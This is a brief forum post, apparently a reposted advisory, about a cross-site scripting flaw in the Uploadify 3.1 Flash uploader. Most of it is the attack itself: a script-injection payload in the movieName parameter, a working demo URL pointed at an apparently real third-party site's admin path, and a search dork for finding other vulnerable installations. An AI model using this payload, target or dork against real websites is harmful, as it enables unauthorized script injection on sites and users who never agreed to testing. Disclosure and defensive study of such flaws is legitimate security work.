Aerosol Posted March 24, 2015 Report Posted March 24, 2015 # Affected software:# Type of vulnerability:# URL: http://www.uploadify.com/# Discovered by: Provensec# Website: http://www.provensec.com#version 3.1# Proof of conceptuploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swfdemohttp://www.renders-dbz.com/admin/include/uploadify/uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swfdork:inurl:uploadify.swf ext:swfSource Quote
